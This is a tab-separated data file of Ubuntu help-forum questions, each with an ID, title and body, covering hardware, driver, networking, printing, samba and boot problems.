487672	wlan0 : error while getting interface flags : no such device	i have encountered an interesting problem with wlan0 in my laptop . i am using intel 5300 wlan card with ubuntu 12.04 in hp elitebook 8570w . wlan0 is active only with the command 'sudo ifconfig wlan0 up ' , but this is valid only until the system is shutdown . once i switch on the system i can not activate the wlan0 anymore . to cross check , i created a new partition and installed the same os to see if the card and os is working fine , it did work ! i 'sudo reboot ' into the other partition and got the same error on the older installations . i am assuming that the driver looses the ability to hook on to the valid firmware once it is powered down . has anybody encountered this problem or know any kind of fix ? thanks !
487673	mouse primary button inverted after resume	being left-handed i normally switch left and right button : so my `` primary button '' is `` right '' . after resume from screen lock the buttons are switched to the default configuration where `` left '' is the `` primary button '' . with ubuntu 13.10 this configuration was fine , i face this problem since i have installed ( from scratch ) ubuntu 14.04 . any suggestion ?
487674	file name is now red and i ca n't find it	i did this mv -f bashthings /playinhere/ to move a directory `` bashthings '' and all of it 's files into another directory `` playinhere '' . now i ca n't see bashthings and when i `` locate '' it , it shows up , but it 's in red . what did i do wrong ? how can i fix this ?
487676	restoring ubuntu on another device	i have installed ubuntu on a dell pc . made an image of it with our imaging software . when i restored the image on another pc . there is only a white cursor blinking . the grub does not come up . is there something like sysprep that makes the system ready and shut its down when it is made system independent ? so i can make an image of it . thanks in advance , kr , joeri
487680	14.04 lts -- mice not working during live boot , any help appreciated	hello i 'm trying to install 14.04 the lastest version of ubuntu . during the live boot i cant get any of my mice to work . i have ran ubuntu on this hardware for a few years now and never had this issue before . i have tried 3 different mice and booted with them plugged into all the different usb 's on my board ( gigabyte ga-990fxa-ud3 am3+ amd 990fx mobo ) ( mice : razer death adder , microsoft mouse and a logitech wireless . ) sadly i need mouse support to dig into the partitioning i need to do to install . thus far i have tried : sudo modprobe -r psmouse sudo modprobe psmouse during the live boot but had no success . any help would be greatly appreciated .
487681	config ubuntu with static ip behind router	hello i have ubuntu server 14.04 , and i want to create a public server , my provider gives me a ip , gateway and network mask , but my server stay under router , and i do n't know how to config it . if i use dhcp i have ip like 1.1.1.62 , my provider gives me 1.1.1.59 . is it possible to do it ? thank you
487684	small icon in the corner that i ca n't remove	i 'm working on some display monitors for a company i work for and for some reason there is this small little icon in the corner . i ca n't interact with it any other way besides just dragging it around . i 'm running lubuntu 12.04 on a pcduino board . could someone please tell me what it is or how to get rid of it ? thanks .
487685	libreoffice not auto-bookmarking heading	i have an .odt document converted from .docx , which i am trying to convert to a pdf . i want to have an auto-generated table of contents using my heading references , but when exported to a pdf , there are no heading references . essentially , i ca n't hyperlink to that heading , ca n't create table of contents entries based on headings , etc . is there any way , and what should i do , to automatically add bookmarks for each heading again ?
487686	synaptic package manager	when i reload in synaptic package manager , i get this : the repository may no longer be available or could not be contacted because of network problems . if available an older version of the failed index will be used . otherwise the repository will be ignored . check your network connection and ensure the repository address in the preferences is correct . failed to fetch http : //ppa.launchpad.net/gwendal-lebihan-dev/cinnamon-stable/ubuntu/dists/trusty/main/source/sources 404 not found failed to fetch http : //ppa.launchpad.net/gwendal-lebihan-dev/cinnamon-stable/ubuntu/dists/trusty/main/binary-amd64/packages 404 not found failed to fetch ( and , ( have n't at least 10 reputation to post more than 2 links ) ) /gwendal-lebihan-dev/cinnamon-stable/ubuntu/dists/trusty/main/binary-i386/packages 404 not found some index files failed to download . they have been ignored , or old ones used instead . my internet connection is fine . are these repositories any good anymore ? should i delete them ?
487691	how are machine hostname and apache virtual hosts connected ?	i 've changed my ubuntu machine hostname with $ sudo hostname newhostname and now sometimes when my website is requested the browser hangs indefinetely until i reboot the server . what is weird is that it does n't happen everytime , sometimes everything works fine . so i 'm not even sure the problem is in the hostname . everyone writes about the importance of hostname being resolved but i just ca n't figure out the connection . can someone please explain ? my production server is down now and i ca n't do anything with it : ( update that is what i get from nslookup mydomain.com server : 8.8.4.4 address : 8.8.4.4 # 53 non-authoritative answer : name : subdomain.mydomain.com address : 777.777.777.77 here is the contents of my hosts file : 127.0.0.1 localhost 127.0.1.1 subdomain subdomain
487694	why i am encountering this error	i just installed new ubuntu 14.04 . i read a post on the internet `` 20 things to do after installing ubuntu 14.04 '' , so i executed the command as they said . install multimedia codecs sudo apt-get install ubuntu-restricted-extras but after this several process were going and suddenly i got this error : errors were encountered while processing : /var/cache/apt/archives/ttf-mscorefonts-installer_3.4+nmu1ubuntu1_all.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 )
487697	how to replace/update python-eggtrayicon in 14.04 ?	i 've wrote a pygtk script using python-eggtrayicon but not available in trusty . however , i 've this package installed in my trusty , because i come from saucy . how can i replace it ? is it possible to build the package in my ppa , to distibute my work ? thanks
487698	no mod-mono.so or mod_mono.conf after install	on ubuntu 12.04 , i have webmin and apache2 . with webmin , i did apt-get install mono-complete and everything appeared to install fine . i put the line `` monoautoapplication enabled '' in httpd.conf and restarted apache2 , but it failes with `` invalid command 'monoautoapplication ' , perhaps misspelled or defined by a module not included in the server configuration '' all the posts i 've read speak of mod-mono.so and mod_mono.conf , but i do n't seem to have them . i tried to find the module or config file # find / -name `` *.so '' | grep -i mono /usr/lib/libmono-profiler-iomap.so /usr/lib/libmono-profiler-aot.so /usr/lib/libmono-profiler-cov.so /usr/lib/libmono-profiler-log.so /usr/lib/libmono-2.0.so /usr/lib/libmonoposixhelper.so /usr/lib/libmonosupportw.so # find / -name `` *.conf '' | grep -i mono /etc/fonts/conf.avail/53-monospace-lcd-filter.conf /etc/fonts/conf.d/53-monospace-lcd-filter.conf i 'm sure i 'm missing something here , but no clue what it is . any help greatly appreciated .
487699	what ubuntu should i use for headless operation ?	i am working on an application that needs to start as soon as the computer powers on but i also need a full ubuntu distribution for application development and maintenance . the custom x86 computer that will support this should arrive 'any day now '' ( with no os installed ) . shortly after i need to move development to it as it will have the hardware that i need to access . when the application is complete the computer will be installed on an aircraft to run some research equipment with the users control gui a web page . i 'm using ubuntu 12.04 64 bit now and need to stay with 12.04 because of a custom driver . i do n't need a distribution loaded with web servers to serve the web page as i have my own server , i 'm thinking that perhaps i should have a dual boot machine with the headless boot as default . the full distribution could be chosen if a monitor etc . are attached at boot . ( btw i will need to install from a thumb drive or external usb disk drive as it has no cd/dvd and i do n't have a usb cd/dvd drive . ) is dual boot a reasonable solution ? what 64 bit ubuntu distributions should i use for the headless boot ? how are they installed , that is can i install a 'head-full ' distribution first then add the headless and then change the order ?
487700	install php 32 bits on ubuntu 64 bit	i 'm currently upgrading servers and i have a nasty bug with php and a database driver . long story short using the 32 bit version of php should fix the issue . i 'm unable to install php5-common : i386 . i have these errors : cron : depends : adduser but not installed php5-common : i386 : depends : sed : i386 ( > = 4.1.1-1 ) but not installed upstart : depends : initscripts depends : mountall depends : ifupdown ( > = 0.6.10ubuntu5 ) is it possible to install the 32 bit version on ubuntu 64 ?
487702	dual boot on linux pc	when i bought my laptop it had windows on it . i soon installed linux as a second operating system on my computer , leaving windows on it . recently my hard drive crashed , so when i got a new hard drive the first thing i did was re-install linux . now i in need of re-installing windows ( i already have a copy on dvd ) . so , how do i install windows ?
487703	folder symlinc to nas	how to i symlink a desktop folder to our local nas . i do n't auto mount the nas , whenever i need to reach it i type in my credentials . does the nas need to be mounted before the a symlink is been forwarded ? right now i 'm just interested for how to symlink directly to 10.101.0.2/groups . what are the options ? mount : sudo mount -t cifs -o credentials=/home/user/.smb , users //10.101.0.2/groups /home/user/mount/
487704	nothing showing in tmux status bar	this is my .tmux.conf # use utf8 set -g utf8 set-window-option -g utf8 on # make tmux display things in 256 colors set -g default-terminal `` screen-256color '' # set scrollback history to 10000 ( 10k ) set -g history-limit 10000 # set ctrl-a as the default prefix key combination # and unbind c-b to free it up set -g prefix c-a unbind c-b # use send-prefix to pass c-a through to application bind c-a send-prefix # shorten command delay set -sg escape-time 1 # set window and pane index to 1 ( 0 by default ) set-option -g base-index 1 setw -g pane-base-index 1 # reload ~/.tmux.conf using prefix r bind r source-file ~/.tmux.conf \ ; display `` reloaded ! '' # use prefix | to split window horizontally and prefix - to split vertically bind | split-window -h bind - split-window -v # make the current window the first window bind t swap-window -t 1 # map vi movement keys as pane movement keys bind h select-pane -l bind j select-pane -d bind k select-pane -u bind l select-pane -r # and use c-h and c-l to cycle thru panes bind -r c-h select-window -t : - bind -r c-l select-window -t : + # resize panes using prefix h , j , k , l bind h resize-pane -l 5 bind j resize-pane -d 5 bind k resize-pane -u 5 bind l resize-pane -r 5 # c-i for even-vertical arrangement and c-o to zoom current pane bind-key c-i select-layout even-vertical bind-key c-v select-layout even-horizontal bind-key c-o resize-pane -y 1000 # sync panes bind c-s set-window-option synchronize-panes # explicitly disable mouse control setw -g mode-mouse off set -g mouse-select-pane off set -g mouse-resize-pane off set -g mouse-select-window off # -- -- -- -- -- -- -- -- -- -- - # copy & paste # -- -- -- -- -- -- -- -- -- -- - # provide access to the clipboard for pbpaste , pbcopy set-window-option -g automatic-rename on # use vim keybindings in copy mode setw -g mode-keys vi # setup 'v ' to begin selection as in vim bind-key -t vi-copy v begin-selection bind-key -t vi-copy y copy-pipe `` reattach-to-user-namespace pbcopy '' # update default binding of 'enter ' to also use copy-pipe unbind -t vi-copy enter bind-key -t vi-copy enter copy-pipe `` reattach-to-user-namespace pbcopy '' bind y run 'tmux save-buffer - | reattach-to-user-namespace pbcopy ' bind c-y run 'tmux save-buffer - | reattach-to-user-namespace pbcopy ' # save entire tmux history to a file - file will be on machine where tmux is # running bind-key * command-prompt -p 'save history to filename : ' -i '~/tmux.history ' 'capture-pane -s -32768 ; save-buffer % 1 ; delete-buffer' # -- -- -- -- -- -- -- -- -- -- -- - # multistart panes # -- -- -- -- -- -- -- -- -- -- -- bind-key p run-shell 'tmux-multistart as' bind-key a run-shell 'tmux-multistart alpha' bind-key b run-shell 'tmux-multistart beta' bind-key w run-shell 'tmux-multistart web' bind-key d run-shell 'tmux-multistart dev' bind-key t run-shell 'tmux-multistart txhub' bind-key c command-prompt -p `` machine ( s ) /group : `` `` run-shell 'tmux-multistart % 1 ' '' # -- -- -- -- -- -- -- -- -- -- -- # set some pretty colors # -- -- -- -- -- -- -- -- -- -- -- # set pane colors - hilight the active pane set-option -g pane-border-fg colour235 # base02 set-option -g pane-active-border-fg colour240 # base01 # colorize messages in the command line set-option -g message-bg black # base02 set-option -g message-fg brightred # orange # -- -- -- -- -- -- -- -- -- -- -- # status bar # -- -- -- -- -- -- -- -- -- -- -- - set-option -g status on # turn the status bar on set -g status-utf8 on # set utf-8 for the status bar set -g status-interval 5 # set update frequencey ( default 15 seconds ) set -g status-justify centre # center window list for clarity # set-option -g status-position top # position the status bar at top of screen # visual notification of activity in other windows setw -g monitor-activity on set -g visual-activity on # set color for status bar set-option -g status-bg colour235 # base02 set-option -g status-fg yellow # yellow set-option -g status-attr dim # set window list colors - red for active and cyan for inactive set-window-option -g window-status-fg brightblue # base0 set-window-option -g window-status-bg colour236 set-window-option -g window-status-attr dim set-window-option -g window-status-current-fg brightred # orange set-window-option -g window-status-current-bg colour236 set-window-option -g window-status-current-attr bright # show host name and ip address on left side of status bar set -g status-left-length 85 set -g status-left `` # [ fg=green ] : # h : # [ fg=brightblue ] # ( curl icanhazip.com ) # [ fg=yellow ] # ( ifconfig en0 | grep 'inet ' | awk ' { print \ '' en0 \ '' $ 2 } ' ) # ( ifconfig en1 | grep 'inet ' | awk ' { print \ '' en1 \ '' $ 2 } ' ) # ( ifconfig en3 | grep 'inet ' | awk ' { print \ '' en3 \ '' $ 2 } ' ) # [ fg=red ] # ( ifconfig tun0 | grep 'inet ' | awk ' { print \ '' vpn \ '' $ 2 } ' ) `` # show session name , window & pane number , date and time on right side of # status bar set -g status-right-length 60 set -g status-right `` # [ fg=blue ] # s # i : # p # [ fg=yellow ] : % d % b % y # [ fg=green ] : % l : % m % p : # ( date -u | awk ' { print $ 4 } ' ) : '' but my tmux status bar does n't show anything
487707	change mouse speed when modifer key is held	i 've actually gotten this usability desire from the blender3d interface , when manipulating a 3d object with the mouse you can often hold shift ( or may be its ctrl ) to reduce the mouse movement 's influence to be something like 1/10th-ish or 1/20th-ish . ( 1/20th is not an exact figure ) effectively that makes it feel like your mouse is now 20 times as precise and there are some times when i 'd like to have pixel precision in a desktop environment . note : i am not interested in mouse acceleration , never will i be . q : can anybody conceive of a way to modify the mouse sensitivity/cursor speed when a modifier key like shift is held , and obviously then go back to normal when the modifier is released ? op note : i am currently running the ubuntu-based linuxmint 16 os .
487708	ubuntu search bar missing letter 'e '	i got a weird problem in ubuntu 14.04 , when i use the dash bar search , if i type in a lower case 'e ' it just displays an empty space instead of the actual letter . capital 'e ' works fine , anybody have this kind of issue before ?
487709	dual boot ubuntu 14.04 with windows 7 on uefi	i just built a new computer last week , and this weekend i got around to attempting to install ubuntu 14.04 on it besides windows 7 . this is my first experience really using uefi , so i was a little surprised that the install process did n't just work for me . no matter what i did , i always ended up with a prompt saying unable to find a medium containing a live file system and i was unable to type anything , though that may be due to my wireless keyboard ( wired is on the way ) . this prompt always comes up after sitting at the ubuntu loading screen for about ~2-3 minutes . i made sure the iso i downloaded was fine by checking the md5sum . rebuilt the bootable usb ( using unetbootin ) twice , no luck . the only thing i was not able to do was turn off secure boot , because i was not able to find the option on my motherboad ( gigabyte 970a-ud3p ) . i 'm not even sure if that 's a uefi feature , or if it 's just a windows 8 feature . i have verified that i am indeed using usb2.0 ports , and not usb3.0 . i am rather lost and not sure how to proceed at this point . any more guidance would be greatly appreciated ! i really despise developing on windows -_- edit : more attempts : ok , i have tried this some more . i have now used rufus , livelinux usb creator , and universal usb installer . none of these have done it either . i have bought a brand new flash drive , that did n't work . every single time it is the same story . ubuntu loading screen for about 2 minutes , then kicked into an ash console with the message of `` unable to find a medium containing a live file system '' . i 'm not even able to type at all at this point , so i ca n't really get any more information . this is incredibly frustrating . i have never had this much trouble getting linux installed before . hardware : gigabyte 970a-ud3p amd fx8350 gtx 760 skill ripjaw 2x4gb ram 1tb hdd
487711	bluetooth problem on asus u32 with ubuntu 14.04	i 'm running ubuntu 14.04 on a asus u32 alongside windows 8 . recently i 've upgraded from 12.04 to 14.04 and since then the bluetooth is not working anymore . whenever i try to turn it on from the settings it just go back off seconds after i turned it on . i 've tryed with the rfkill command and it says that the bluetooth device is not blocked ( both soft and hard ) . i have no idea what is wrong and how to solve this issue .
487713	mysql hangs website	when i request my website through browswer , the website hangs for indefinite time . if i shut down mysql , then the request is processed very quickly . so i presume that mysql is responsible for that . i enabled logging and here is what i see : 1 40624 21:09:53 1 query use `inreadobase` 1 query select @ @ collation_database 1 query show triggers like 'br\_access\_rights' 1 query set session character_set_results = 'utf8' 1 query show table status like 'br\_additional\_word' 1 query set sql_quote_show_create=1 1 query set session character_set_results = 'binary' 1 query show create table `br_additional_word` //many similar records here 140624 21:18:06 11 query set session character_set_results = 'binary' 10 query set session character_set_results = 'utf8' 9 query set sql_quote_show_create=1 11 query use `inreadobase` 10 query show table status like 'require\_transcription\_or\_audio\_words' 9 query set session character_set_results = 'binary' 11 query select @ @ collation_database 10 query set sql_quote_show_create=1 9 query show create table `tb_user_text` 11 query show triggers like 'br\_language' 10 query set session character_set_results = 'binary' 9 query set session character_set_results = 'utf8' 11 query set session character_set_results = 'utf8' 10 query show create table `require_transcription_or_audio_words` 9 query show fields from `tb_user_text` 11 query show table status like 'br\_part\_of\_speech' 10 query set session character_set_results = 'utf8' 9 query select /* ! 40001 sql_no_cache */ * from `tb_user_text` 11 query set sql_quote_show_create=1 10 query set session character_set_results = 'binary' 9 query set session character_set_results = 'binary' 11 query set session character_set_results = 'binary' as you can see the time passed between the first record and the last is already 9 minutes , and the log continues to increase while the site hangs . what is wrong here ? edit i 've found that php executes some of the queries in the log . this mysql log file is already 2gb and most of the requests are repeated for 10 times or more .
487716	installing ubuntu 14.04 on macbook pro 4,1	i 've been reading lots of posts about how to create a bootable usb and how to install but i have n't been successful . i 've created the `` bootable '' usb following this guide from ubuntu site . when i boot with refind , my usb is not even listed . pressing alt/option key when rebooting i manage to have my usb listed and boot . however i get the following error message : could not open `` \efi\boot\fallback.efi '' : 14 error : file `/boot/ ' not found . however , a grub screen appears with the options for : install trying ubuntu without installing check memory but after choosing any option i get stuck with a black screen . thanks for your help .
487717	ubuntu 14.04 installation does n't show options to dual-boot with windows 7	i 'm trying to install ubuntu 14.04 64bit to my acer am3400 and dual-boot with windows 7 . my hard drive already has four partitions : two small ones , the windows 7 and an empty d partition , about the same size as the windows partition . i 'm thinking of installing ubuntu to d partition ( that 's gon na work , right ? ) . i 'm installing from usb and everything goes well until the installation gets to `` installation type '' -part . i think it 's skipping over some part , since after checking the memory and internet it just goes straight to installation type . i get no options of if i want to install alongside windows or delete windows or anything . and in the `` installation type '' it does n't show anything in the box . - , + or change options do n't work and only the quit , back and install now buttons do something . if i hit install now , i get an error message saying `` no root file system is defined '' . this all happens if i install after first going to `` try without installing '' -option . if i choose `` install now '' , it does n't even get to installation type part without showing error message ( different , it says ubi-partman failed with exit code ... i can get past this but it shows up at every part of installation with different exit code and finally it just stops at getting time from network server or something similar . and i still do n't get to choose if i want to install alongside windows or something else ) . i 've tried to download ubuntu again and used a different usb stick but it does n't work . does anyone have any idea of how i should proceed from here ? i 'm still new to linux and ubuntu and english is n't my fist language so sorry for mistakes . : )
487721	cups - print job is received but not printing	i am trying to install a network printer just for home use . the printer works fine with my windows 7 machine . but i thought why not put it on my ubuntu server as a network printer and so i did . i installed cups already and it works without problems . even the printer was recognized directly . but when i try to print a document it always says : `` waiting for printer to become available . '' on the webpage . any ideas on how i can fix this ? do i need to configure anything additionally for usb printers ? by the way i am talking about a canon mp260 .
487725	how can i draw selection rectangle on screen for my script ?	i am trying to make a simple screencasting bash script . i want to get screen selection coordinates by drawing a red rectangle with mouse . i can use xdotools to get coordinates but how can i draw rectangle on screen ?
487726	can not connect my iphone to ubuntu	i am trying to plug my iphone with ios7 to my ubuntu computer . i have installed everything that is necessary , however i get the following error when i run sudo ifuse /mnt/myiphone , usbmuxd_get_device_list : error opening socket ! no device found , is it connected ? if it is make sure that your user has permissions to access the raw usb device . if you 're still having issues try unplugging the device and reconnecting it .
487729	how do you update an old integrated intel gpu 's drivers to work with steam ?	i am trying to play steam games on my computer running ubuntu 14.04 . on launching team fortress 2 i receive the error can not find required opengl entry point 'glgeterror ' ! either your video card is unsupported , or your opengl driver need to be updated . i tried sudo rm /usr/lib/i386-linux-gnu/libgl.so and rm .local/share/steam/ubuntu12_32/steam-runtime/i386/lib/i386-linux-gnu/libgcc_s.so.1 with no luck . what is going wrong exactly and how should i attempt to go about fixing it . i am using integrated intel graphics . system settings call it an intel速 945g x86/mmx/sse2 . my driver is an intel open source technology center mesa dri intel ( r ) 945g x86/mmx/sse2
487731	plop linux returns to grub2 instead of loading	i 've recently posted something about this , but i have no idea how to remove it as i am new to stack exchange and have n't learned everything yet . so , basically when i try to load plop bootmanager , the pc screen goes black for 1.5 seconds then returns to grub2 . i 'm trying to make it load plop bootmanager from the bootloader , but keep grub2 , like you can do on windows . the reason for this is because after installing ubuntu it might have done a bios mod or something because the pc no longer has the capability of booting from cd/usb and i want to be able to do it . here 's how my partitions are configured . i was unsure how to add the contents of a file , so i 'll just upload my grub.cfg and 40_custom files here .
487732	thunderbird selective transmissions	i have been operating well since 1 april . however , since 19june there are some e-mail addresses that i can not send to . they are signalled gone in sent box but never received at destination . i can receive from those addresses ( all addresses ) ok . there is one more slight problem since noticed . there are no outgoing posts in the server sent box since 1stmay . i can send to any address from the server which points at thunderbird corruption . checked thunderbird account & preference settings , no restrictions or incorrect checks . tried toggle > re-boot > re-toggle > reboot to try and reset markers . still the same . how can i un-install & re-install thunderbird without losing my address books ? please help ! regards , berry
487733	errors changing ubuntu permission files for bluej	i have currently installed bluej , i am currently stuck on being able to add the external libraries to the bluej userlib . i have tried following the commands giving in edx and end up with this error on my terminal . i have tried the sudo chmod -r with no avail . zsh : no matches found : kirsnik/usr/share/bluej/userlib/*.jar i am running ubuntu no lsb modules are available . distributor id : ubuntu description : ubuntu 12.04.4 lts release : 12.04 codename : precise
487738	network broadband	how to enable mobile broadband and connect to it from the list of networks because it is not visible to me in the list of networks which are displayed as connectable
487739	pure-ftpd set default uid and gid for nginx and fpm	i have web application on my ubuntu 14.04 , i installed pureftpd it runs fine . normally i create ftpuser and ftpgroup , create a new user with pure-pw and it works fine . after ftp uploads are complete , i need to change the user : group to www-data : ftpgroup for nginx and fpm . i do n't want to give 777 to all folders , is there any way to set default uid : gid with pure-ftpd.conf file or some other preferable method ? i do n't have any local user , also i do n't want to use local user if i can avoid it . ftp users are in pdb .
487740	how do you view all of the banned ip 's for ubuntu 12.04 via the command line ?	i ca n't seem to find a quick command to just view all the banned ip 's on the server . or is there a file i can just edit ? i 'm guessing fail2ban is the one that inputs all the ip 's to ban . where do i adjust the settings for it ? i seem to be able to only login to my server remotely only if i disable ufw . i ca n't seem to find out how to unban myself . i do n't even know why i was banned in the first place . is there a log of some sort to view all the attempts made ?
487741	how to remove an apt package ?	hello i 'd like to know how to remove 2 apt things that gets an error any time i type apt-get update here is the output at the end `w : failed to fetch https : //github.com/gyazo/gyazo-for-linux/dists/trusty/main/binary-amd64/packages httperror404 w : failed to fetch https : //github.com/gyazo/gyazo-for-linux/dists/trusty/main/binary-i386/packages httperror404 ` i 've already tried ppa purge and apt remove neither worked .
487742	synchronize source software	i have three computers with ubuntu . i know how that there 's a way to synchronize packages installed from the ubuntu software center , but ... what if i want to synchronize software from source ? do you have any idea how might do that ? thanks .
487743	is fingerprint-gui a security hole ?	i have a thinkpad t440 on ubuntu 14.04 . i use fingerprint-gui to allow me to login and use sudo by swiping a fingerprint . the worrying part is that anyone can run the fingerprint-gui program to reprogram the fingerprints -- so , anyone can get into my computer , given a few minutes ! this seems like a gaping security hole . how can i patch this ?
487746	ubuntu installation overwrote my windows	while i was installing ubuntu , it installed the os on the entire 1tb hard drive . i had about 800gb of data and it seems i ca n't access it anymore . the entire hard drive is now occupied with ubuntu . is it still possible to recover the data or is it lost forever ?
487747	accessing scanners attached to thin clients	i have been using ltsp in one distribution or another for the last 10 years . we currently have ubuntu 10.04 lts ltsp deployed at several sites and have begun the process of migrating them to ubuntu 12.04 lts . having built a server from scratch with all the options we need working ( or so we thought ) and completed a 10.04 lts to 12.04 lts migration , we find that users on thin clients are not able to use simple-scan to scan documents . once again this was working prior to the server migration . i can confirm that the scanner ( fujitsu fi-6130 ) works and scans if plugged directly into the server . i have enabled ssh access to a thin client and confirmed that sane-find-scanner and scanimage -l find and scan when the scanner is attached to the thin client . output below is from the ssh shell once connected . sane-fine-scanner # sane-find-scanner will now attempt to detect your scanner . if the # result is different from what you expected , first make sure your # scanner is powered up and properly connected to your computer . # no scsi scanners found . if you expected something different , make sure that # you have loaded a kernel scsi driver for your scsi adapter . found usb scanner ( vendor=0x04c5 , product=0x1097 ) at libusb:001:003 # your usb scanner was ( probably ) detected . it may or may not be supported by # sane . try scanimage -l and read the backend 's manpage . # not checking for parallel port scanners . # most scanners connected to the parallel port or other proprietary ports # ca n't be detected by this program . scanimage -l root @ ws001 : ~ # scanimage -l device `fujitsu : fi-5110cdj:509947 ' is a fujitsu fi-5110cdj scanner i have confirmed the /opt/ltsp/i386/etc/lts.conf has the following : [ default ] scanner=true getltscfg -a returns : root @ ws001 : ~ # getltscfg -a ldm_directx= '' true '' scanner= '' true '' export ldm_directx export scanner /etc/sane.d/saned.conf contains a single line , which is the ip of the ltsp server : 10.0.0.9 /etc/sane.d/net.conf only contains commented lines . if i try to start simple scan on the this client gui is see in the syslog on the thin client : jun 24 14:44:46 ws001 saned [ 2637 ] : check_host : access by remote host : : :ffff:10.0.0.9 jun 24 14:44:46 ws001 saned [ 2637 ] : init : access granted to saned-user @ : :ffff:10.0.0.9 jun 24 14:45:20 ws001 saned [ 2637 ] : quit : exiting the gui indicates no scanners are found .
487749	ca n't find printer in the printing program officejet 6500	i have the following problem : i ca n't find my hp officejet 6500 pro to connect it with my ubuntu 12.04 laptop . before it worked perfectly , but since i use an extra router i cant connect to my printer ( it does n't detect at all ) . i think it is a firewall problem somewhere but i would like to know how i could fix this . i tried with the hplip software but also did n't detect my printer . thanks in advance ! bart
487752	asus g73gj fan runs full speed all the time .	i have an asus g73jh , i 'm not sure what bios version i have but my laptop seems to have the fans running full speed all the time . i installed lmsensors and my laptop is normally around 56c ( which is allot cooler than it used to run at 76c before i switched to ubuntu ) . my question is , do i need to change something in the bios ? or is there a program for 14.04 to control fan speeds ? when i ran sensorsdetect i only saw the cpu listed . thanks , joe
487753	dual boot or virtual box ssd	i 'm using my laptop primairily for school and webbrowsing ( including several musicplayers and videoplayers ) but i want to use dual boot/virtualbox for improved compatability ( ms office extensions , occasionally a game ( 1 installed on my laptop , nothing demanding ) netflix ( dns or vpn hiders , due to microsoft silverlight easier with windows ) ) . i want to use the latest version of ubuntu ( no swap due to 8g of ram ) next to windows 8 ( probally 50-50 usage ratio ) . the laptop that i 'm using is a dell insperion 5521 with an i7-3537u processor 8g ram and a radeon hd 8730m . the origin of my question is my solidstatedrive , i use a 120g ssd drive . i dont know what is the best method for this kind of setup . can i use dual boot safely ( with proper disk partitioning ) due to constantly writing and erasing a specific part of the ssd as a effect of the partitioning . or is it recommended to make the partitions for the operating systems as small as possible and therefore create one big data partition used by both systems . and do i need to make another partition with unallocated space or will one big data partition with probally 40g-50g free space suffice for school/data i use dropbox and am able to play games from external hdd and does virtualbox need the same partitions as a dual boot and provide the same problems ? i hope that anybody can help me with my problem : )
487754	recovered ubuntu , but it still launches corrupt version	i am ubuntu newbie , so this one may be obvious . while playing with some ubuntu themes , i have messed something up with my ubuntu 14.04 ( keyboard stopped working and unity looks damaged too - no bars etc . ) , so i used advanced options in grub menu and picked up one of the previous versions . recovery was successful . however , when i restart my laptop , it loads the corrupt version of ubuntu , where i ca n't even launch the terminal . i can repeat the whole process and recover it again , but is there a way to set the `` recovered ubuntu '' as a default one ?
487755	problem with graphics after resuming hibernation	i am using kubuntu 14.04. when i have hibernate system through sudo pm-hibernate , the system hibernate successfully but when i resume it after one minute of reloading many applications to ram , the taskbar ( below panel ) freezes and every windows that have text looks line by line distorted . the firefox tabs , the editor and everythings looks awkward . is there any command or service to solve this problem ? i have not clear understanding of kde modules and objects . i have checked service lightdm restart but it did not seem to be good idea . because it kills everything and start log on screen ! i would need to my applications to be opened and ui that have distorted rerun again . is there any way ? excuse me.i did not have at least 10 reputations to post images . thanks for your support .
487758	samba and groups	ok i 've been reading about samba shares etc . for the past few days , i still can not get it to work . i 've gotten a public share and a private user share to work , but not a group share . [ global ] workgroup = workgroup log file = /var/log/samba/log. % m max log size = 1000 syslog = 0 map to guest = bad user # state directory = /var/lib/samba # usershare path = /var/lib/samba/usershares [ public ] comment = public share path = /srv/abc/public browsable = yes writable = yes ready only = no guest ok = yes create mask = 0777 create directory = 0777 [ private ] comment = private share path = /srv/abc/private browsable = yes writable = yes security = user valid users = test ready only = no guest ok = no create mask = 0777 create directory = 0777 [ mygroup ] comment = mygroup server files path = /srv/mygroup browsable = yes writable = yes security = user valid users = @ mygroup force group = mygroup ready only = no guest ok = no create mask = 0777 create directory = 0777 force create mode = 0777 force security mode = 0777 force directory mode = 0777 i done the following to add a user an d group . sudo useradd karl sudo passwd karl sudo groupadd mygroup sudo usermod -a -g mygroup karl sudo smbpasswd -a karl sudo mkdir /srv/mygroup sudo chmod 777 /srv/mygroup sudo chgrp mygroup /srv/mygroup sudo chown mygroup /srv/mygroup i still ca n't log into it via my windows 8 .
487760	peaceful coexistance of intel and nviidia glx	i have an optimus laptop , so both intel and nvidia cards . it has worked fine for years ( running 12.04 ) using bumblebee . yes , i know there are better options by now , but it works fine . problem is , for various reasons i needed the cuda 6 toolkit , which means an external install . unsurprisingly , it squashed my glx library . currently the nvidia hardware works fine , but the intel hardware ( that is , my xserver on :0 ) ca n't successfully load glx . i would hazard a guess that perhaps it has something to do with the intel xorg initialization log containing [ 77.269 ] ( ii ) loadmodule : `` glx '' [ 77.269 ] ( ii ) loading /usr/lib/xorg/modules/extensions/libglx.so [ 77.277 ] ( ii ) module glx : vendor= '' nvidia corporation '' [ 77.277 ] compiled for 4.0.2 , module version = 1.0.0 [ 77.277 ] module class : x.org server extension # ... [ 77.469 ] ( ee ) failed to initialize glx extension ( compatible nvidia x driver not found ) dpkg -s agrees that /usr/lib/xorg/modules/extensions/libglx.so `` belongs '' to xserver-xorg-core , so i 'm reasonably sure that a forced reinstall of that package would put libglx.so back to the `` correct '' version . the only problem is that that would break the nvidia side . intel does n't use an xorg.conf , nvidia uses one via bumblebee . is there a way that i can get these two drivers to coexist in peace ?
